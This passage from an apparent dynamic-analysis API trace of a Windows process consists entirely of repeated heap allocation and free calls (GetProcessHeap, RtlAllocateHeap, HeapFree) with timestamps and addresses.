returned 0xe30000 [0100.372] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.373] GetProcessHeap () returned 0xe30000 [0100.373] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.373] GetProcessHeap () returned 0xe30000 [0100.374] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.374] GetProcessHeap () returned 0xe30000 [0100.374] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.374] GetProcessHeap () returned 0xe30000 [0100.375] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.375] GetProcessHeap () returned 0xe30000 [0100.375] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.376] GetProcessHeap () returned 0xe30000 [0100.376] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.376] GetProcessHeap () returned 0xe30000 [0100.377] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.377] GetProcessHeap () returned 0xe30000 [0100.377] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.378] GetProcessHeap () returned 0xe30000 [0100.378] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.378] GetProcessHeap () returned 0xe30000 [0100.379] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.379] GetProcessHeap () returned 0xe30000 [0100.379] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 